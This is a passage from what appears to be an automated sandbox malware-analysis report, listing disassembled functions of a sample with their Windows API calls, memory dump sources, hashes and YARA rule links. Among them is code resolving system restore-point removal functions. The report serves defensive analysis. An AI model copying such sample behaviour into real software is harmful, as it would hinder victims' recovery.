                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog__ftol
                                                                                  • String ID: Enabled$Text$Visible
                                                                                  • API String ID: 2123048387-1258828939
                                                                                  • Opcode ID: d67fd1ab2e22001e29231bb87058fa1e38bd03c7f8eccca9ce09a03a130009bf
                                                                                  • Instruction ID: 7195619b2e3654ba354e6922707d6a0a44ada4efaa78e5adbad629ea1bfedfff
                                                                                  • Opcode Fuzzy Hash: d67fd1ab2e22001e29231bb87058fa1e38bd03c7f8eccca9ce09a03a130009bf
                                                                                  • Instruction Fuzzy Hash: F411E33610692576DA0237A69C03FDF260D9F463A8F14050FF915290E2AF6D639383EE
                                                                                  Function 00458F9F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00458FA4
                                                                                  • CreateFontIndirectA.GDI32(FFFFFFF3), ref: 00459038
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFontH_prologIndirect
                                                                                  • String ID: Marlett$T
                                                                                  • API String ID: 212487996-2865571273
                                                                                  • Opcode ID: 2b0842f026824fd6e806307688a737ff0a2e513f68cb977b4e25a291674a4dbc
                                                                                  • Instruction ID: af52eaccd5eb40c4b1044cd566e032a0217a87fe694a4b12a53eca48dccd656e
                                                                                  • Opcode Fuzzy Hash: 2b0842f026824fd6e806307688a737ff0a2e513f68cb977b4e25a291674a4dbc
                                                                                  • Instruction Fuzzy Hash: A221A1B1C04298EECF11DBE9D895ADEFBB4AF25308F44016EF111B7282C7785909CB69
                                                                                  Function 0044D1EB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0044D1F0
                                                                                  • CreateFontIndirectA.GDI32(FFFFFFF3), ref: 0044D281
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFontH_prologIndirect
                                                                                  • String ID: Marlett$T
                                                                                  • API String ID: 212487996-2865571273
                                                                                  • Opcode ID: 1b62fb7ebdf35993cfb0be25898fb7082d1ba8d92aaacec9b18da82a84038590
                                                                                  • Instruction ID: e0f7cbda2d5929d549974ec4e365966363d42c5acbe641775969b79de39f349d
                                                                                  • Opcode Fuzzy Hash: 1b62fb7ebdf35993cfb0be25898fb7082d1ba8d92aaacec9b18da82a84038590
                                                                                  • Instruction Fuzzy Hash: FE2192B1C04298EEDF11EBE9D895BDDBB74BF25308F44016EE111A7282C7785909CB65
                                                                                  Function 004145BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004145C2
                                                                                  • FormatMessageA.KERNEL32(00001300,00000000,000000FF,00000400,?,00000000,00000000,00523A30,?,?,00000000), ref: 004145FB
                                                                                  • LocalFree.KERNEL32(?,?), ref: 00414625
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: FormatFreeH_prologLocalMessage
                                                                                  • String ID: Unknown error.
                                                                                  • API String ID: 1380236612-4225751778
                                                                                  • Opcode ID: 02109e0bec9d850b2004846ae79263ef8337b5883cdba9afc6f5bc6e6f64563a
                                                                                  • Instruction ID: b2f9e91ba35779c885f8761fedbd08b48a8e4367c680402b3f28deb291a5c119
                                                                                  • Opcode Fuzzy Hash: 02109e0bec9d850b2004846ae79263ef8337b5883cdba9afc6f5bc6e6f64563a
                                                                                  • Instruction Fuzzy Hash: 7911827590025AAEDB04EF95DC81EEEBB38FF50759F10402EF502B6191CB785E44CB64
                                                                                  Function 0040C39D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0040C412
                                                                                  • TranslateMessage.USER32(?), ref: 0040C442
                                                                                  • DispatchMessageA.USER32(?), ref: 0040C44C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$DispatchPeekTranslate
                                                                                  • String ID:
                                                                                  • API String ID: 4217535847-3916222277
                                                                                  • Opcode ID: a921475d4ef06622d89896c9309cf0f9ca651fab3d7c08b897c7fe13daa55a8c
                                                                                  • Instruction ID: 221f7586b05350e79d6d81648bcd6839419b0a175b5281decc0391173994cc07
                                                                                  • Opcode Fuzzy Hash: a921475d4ef06622d89896c9309cf0f9ca651fab3d7c08b897c7fe13daa55a8c
                                                                                  • Instruction Fuzzy Hash: 7E11F8B1A0130DDBEF24CFD0D989BDEBBB9BB40708F108129E541BA2C5D7B994498B54
                                                                                  Function 004B0F3D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InterlockedIncrement.KERNEL32(00526E2C), ref: 004B0F63
                                                                                  • InterlockedDecrement.KERNEL32(00526E2C), ref: 004B0F78
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Interlocked$DecrementIncrement
                                                                                  • String ID: ,nR
                                                                                  • API String ID: 2172605799-2953646183
                                                                                  • Opcode ID: 267e69bebfa22e1b6f8b1301a3cee8090a287689bff17576a2c63f251e807509
                                                                                  • Instruction ID: 7463ad0990eaaa2056b28479117c437d8130416a4bd4261629b17526e39b1374
                                                                                  • Opcode Fuzzy Hash: 267e69bebfa22e1b6f8b1301a3cee8090a287689bff17576a2c63f251e807509
                                                                                  • Instruction Fuzzy Hash: 22F0C2322042029FD730AB55ECC59EB67A9FF91326F15043FF1408A191C7E898469979
                                                                                  Function 004C0CA5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InterlockedIncrement.KERNEL32(00526E2C), ref: 004C0CB1
                                                                                  • InterlockedDecrement.KERNEL32(00526E2C), ref: 004C0CC8
                                                                                    • Part of subcall function 004B62F4: RtlInitializeCriticalSection.NTDLL(00000000), ref: 004B6331
                                                                                    • Part of subcall function 004B62F4: RtlEnterCriticalSection.NTDLL(00000010), ref: 004B634C
                                                                                  • InterlockedDecrement.KERNEL32(00526E2C), ref: 004C0CF8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Interlocked$CriticalDecrementSection$EnterIncrementInitialize
                                                                                  • String ID: ,nR
                                                                                  • API String ID: 2038102319-2953646183
                                                                                  • Opcode ID: 2f36d32a6d4afa2985c9e7afe75ec3a98512561b2c0aebbca8b64118a0abd53e
                                                                                  • Instruction ID: 6506c8327a95d1bdc448548adada9ffb9a695e0f943eb38252832866ee4feeaf
                                                                                  • Opcode Fuzzy Hash: 2f36d32a6d4afa2985c9e7afe75ec3a98512561b2c0aebbca8b64118a0abd53e
                                                                                  • Instruction Fuzzy Hash: 06F0243710024AEFDB003F95EC85EDB3B5CEF54324F06003FFA0509141CAB9991286A9
                                                                                  Function 00415163 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041511C: LoadLibraryA.KERNEL32(srclient.dll,00415132,?,?,00000000,00414FFB,00000000), ref: 00415121
                                                                                  • GetProcAddress.KERNEL32(00000000,SRRemoveRestorePointA), ref: 00415183
                                                                                  • GetProcAddress.KERNEL32(?,SRRemoveRestorePoint), ref: 00415192
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                  • String ID: SRRemoveRestorePoint$SRRemoveRestorePointA
                                                                                  • API String ID: 2238633743-253102451
                                                                                  • Opcode ID: d64cc5536e252ecd0773bcb8b203f4e0bb557dcf3cb7571811442233f60b7ffa
                                                                                  • Instruction ID: 30fb8fdcd1370e5ef898bfce75ee7517194eb9cc9b88c6beb556d0120362646a
                                                                                  • Opcode Fuzzy Hash: d64cc5536e252ecd0773bcb8b203f4e0bb557dcf3cb7571811442233f60b7ffa
                                                                                  • Instruction Fuzzy Hash: 66E08632F00B31AB4722AA799C80BCBA6DCAFE17E130605B2E600E7210D6648C4087AC
                                                                                  Function 00415128 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041511C: LoadLibraryA.KERNEL32(srclient.dll,00415132,?,?,00000000,00414FFB,00000000), ref: 00415121
                                                                                  • GetProcAddress.KERNEL32(00000000,SRSetRestorePointA), ref: 00415148
                                                                                  • GetProcAddress.KERNEL32(?,SRSetRestorePoint), ref: 00415157
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                  • String ID: SRSetRestorePoint$SRSetRestorePointA
                                                                                  • API String ID: 2238633743-765413090
                                                                                  • Opcode ID: c674840aa16af4a8e5941e48b91b7980aca67e1904509a40575904b8ccf66a2f
                                                                                  • Instruction ID: 0e7b13f567c195c7f1e3aeca064ad225f795f8b9d4c8d9f6836b3024978ffe7a
                                                                                  • Opcode Fuzzy Hash: c674840aa16af4a8e5941e48b91b7980aca67e1904509a40575904b8ccf66a2f
                                                                                  • Instruction Fuzzy Hash: 8EE08032B00A35A747226A794C80BC7A6D8AFD57A03060172E600D7310C7648C40879C
                                                                                  Function 004B8583 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,004AF659), ref: 004B8588
                                                                                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004B8598
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                  • API String ID: 1646373207-3105848591
                                                                                  • Opcode ID: 6a2cfa6aeef1491d55ec309768ecfe3db66066cf24621627ca0a40ef32a6fdd5
                                                                                  • Instruction ID: a57e73e2bb75307bdcd2e85eb56f4008d7d981af8501584ad9a2421c441afd51
                                                                                  • Opcode Fuzzy Hash: 6a2cfa6aeef1491d55ec309768ecfe3db66066cf24621627ca0a40ef32a6fdd5
                                                                                  • Instruction Fuzzy Hash: 82C08CA0382382FADAB02BB29C89B7E220C1B40B83F24007AB599D81D1CE7CC501C03D
                                                                                  Function 004BCE5D Relevance: 6.1, APIs: 4, Instructions: 135fileCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,?,?), ref: 004BCF24
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3934441357-0
                                                                                  • Opcode ID: ce2be10858e20f42b9b81b5f0f472577c7ededea04bc90177a9a4b9f49d54ced
                                                                                  • Instruction ID: 93d5f1e93731bec4abcc8be17150fd1e1744ff549c31e4c98000a0a09003f6e5
                                                                                  • Opcode Fuzzy Hash: ce2be10858e20f42b9b81b5f0f472577c7ededea04bc90177a9a4b9f49d54ced
                                                                                  • Instruction Fuzzy Hash: 5A519D31900208EFCB11DF68C8C4AEEBBB5EF45344F2085ABE8159B291D774DA41CB79
                                                                                  Function 0044820E Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004C9592: ShowWindow.USER32(?,?,004CA545,00000000,0000E146,00000000,?,?,0040A373), ref: 004C95A0
                                                                                    • Part of subcall function 004C9476: SetWindowTextA.USER32(00000000,00000001), ref: 004C9484
                                                                                  • GetWindowRect.USER32(?,?), ref: 0044823F
                                                                                  • GetWindowRect.USER32(?,?), ref: 00448248
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 00447B48: __EH_prolog.LIBCMT ref: 00447B4D
                                                                                    • Part of subcall function 00447B48: GetDC.USER32(?), ref: 00447B90
                                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,00000001,?,?,?,?,00000000), ref: 00448309
                                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00448340
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$RectRedraw$H_prologIncrementInterlockedShowText
                                                                                  • String ID:
                                                                                  • API String ID: 878543187-0
                                                                                  • Opcode ID: 65fe9e1940129650144afb7f3abf200f655a85f99cf88ee5470afe1b125bb1f5
                                                                                  • Instruction ID: bdf574744a0fd40e12146c129acc06e2f339a664087c471db0752594b5c75de0
                                                                                  • Opcode Fuzzy Hash: 65fe9e1940129650144afb7f3abf200f655a85f99cf88ee5470afe1b125bb1f5
                                                                                  • Instruction Fuzzy Hash: AE415F75E00119AFDF05DFA8CD85EEEBBB5FB48304F10416AE901B7285DA75AE01CB94
                                                                                  Function 0041C97A Relevance: 6.1, APIs: 4, Instructions: 111networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InternetCanonicalizeUrlA.WININET(00000825,?,00000825,?), ref: 0041C9C4
                                                                                  • GetLastError.KERNEL32(?,00000825,?), ref: 0041C9CA
                                                                                  • InternetCanonicalizeUrlA.WININET(00000825,00000000,00000824,?), ref: 0041C9F0
                                                                                  • InternetCrackUrlA.WININET(?,00000000,?,?), ref: 0041CA16
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$Canonicalize$CrackErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 2691905175-0
                                                                                  • Opcode ID: 2252c0795c9837b5ead2f32c7931c4325569a2d7cc3db887cb4dc46805a76772
                                                                                  • Instruction ID: 4d26e904cd6159e36f6c02495d3d9e6b7e103ed7a3b0d0be63ba7845e993edb0
                                                                                  • Opcode Fuzzy Hash: 2252c0795c9837b5ead2f32c7931c4325569a2d7cc3db887cb4dc46805a76772
                                                                                  • Instruction Fuzzy Hash: 664133B955024E9BDB12CF54CC80BEB3BA5FF08394F114056E8169B340DA78DDC1CBA9
                                                                                  Function 004744FF Relevance: 6.1, APIs: 4, Instructions: 97windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00474504
                                                                                  • GetFileAttributesA.KERNEL32(?,?,?,?,?,004741D2), ref: 004745D5
                                                                                  • ExtractIconA.SHELL32(?,?,00000000), ref: 004745ED
                                                                                  • LoadIconA.USER32(?,00000073), ref: 0047460D
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 0047FCF1: __EH_prolog.LIBCMT ref: 0047FCF6
                                                                                    • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                    • Part of subcall function 004B0B55: GetFileAttributesA.KERNEL32(-R,004BD3B6,?,00000000,00000000,00522DE4,?,?,?,004EF72C,00000000), ref: 004B0B59
